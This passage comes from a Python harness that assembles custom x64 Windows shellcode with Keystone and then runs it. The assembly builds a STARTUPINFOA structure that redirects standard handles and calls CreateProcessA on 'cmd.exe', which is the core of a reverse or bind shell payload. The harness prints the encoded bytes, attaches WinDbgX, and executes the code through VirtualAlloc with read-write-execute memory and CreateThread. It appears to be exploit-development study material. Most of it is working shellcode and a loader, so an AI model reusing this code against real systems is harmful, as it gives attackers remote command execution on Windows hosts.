    " push rax;"                     # +0x46   } zero bytes covering lpReserved2, cbReserved2, wShowWindow and the upper half of dwFlags
    " push rax;"                     # +0x3e  /
    " mov rax, 0x100;"               # 0x100 = STARTF_USESTDHANDLES
    " push ax;"                      # +0x3c dwFlags (low word) = 0x100
    " xor rax,rax;"
    " push ax;"                      # +0x3a \ dwFillAttribute = 0
    " push ax;"                      # +0x38 /
    " push rax;"                     # +0x30 dwXCountChars / dwYCountChars = 0
    " push rax; "                    # +0x28 dwXSize / dwYSize = 0
    " push rax; "                    # +0x20 dwX / dwY = 0
    " push rax; "                    # +0x18 lpTitle = NULL
    " push rax; "                    # +0x10 lpDesktop = NULL
    " push rax; "                    # +0x08 lpReserved = NULL
    " mov rax, 0x68;"                
    " push rax;"                     # +0x00 cb = 0x68 (SizeOfStruct)
    " mov rdi,rsp;"                  # Copy the Pointer to RDI


    # Call CreateProcessA (stack offsets are relative to RSP at the call)
    " mov rax, rsp;"                # Get current stack pointer
    " sub rax, 0x500;"              # RAX = address 0x500 bytes below the current stack pointer
    " push rax; "                   # [rsp+0x48] lpProcessInformation = that scratch address
    " push rdi; "                   # [rsp+0x40] lpStartupInfo        = Pointer to STARTUPINFOA
    " xor rax, rax; "
    " push rax; "                   # [rsp+0x38] lpCurrentDirectory   = NULL
    " push rax; "                   # [rsp+0x30] lpEnvironment        = NULL
    " push rax;"                    # [rsp+0x28] dwCreationFlags      = 0
    " inc rax;  "
    " push rax; "                   # [rsp+0x20] bInheritHandles      = 1
    " xor rax, rax; "
    " push rax;"                    # \
    " push rax;"                    #  } four zero qwords occupying [rsp+0x00..0x1f],
    " push rax;"                    #  } the slots below the stack arguments
    " push rax; "                   # /
    " mov r8, rax; "                # R8  = lpProcessAttributes = NULL
    " mov r9, rax; "                # R9  = lpThreadAttributes  = NULL
    " mov rdx, rcx; "               # RDX = lpCommandLine       = "cmd.exe" string
    " mov rcx, rax; "               # RCX = lpApplicationName   = NULL
    " call r12; "                   # Call CreateProcessA

    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    # ks.asm returns the assembled bytes and a count
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode

    shellcode = bytearray(sh)
    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    # Launch WinDbgX against this process (/p <pid>, /g) so the int3 above is caught by the debugger.
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    # Pause so the debugger has time to attach before the code runs.
    input("Press any key to continue...");

    # Declare pointer-sized return/argument types so 64-bit addresses are not truncated by ctypes' default int.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    # NOTE(review): argtypes are set on RtlCopyMemory here, but the copy below calls RtlMoveMemory.
    ctypes.windll.kernel32.RtlCopyMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    # Allocate len(shellcode) bytes: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    # Copy the assembled bytes into the allocated region.
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    # Start a thread at the beginning of the region and block until it exits (-1 = wait indefinitely).
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

# Run the harness only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()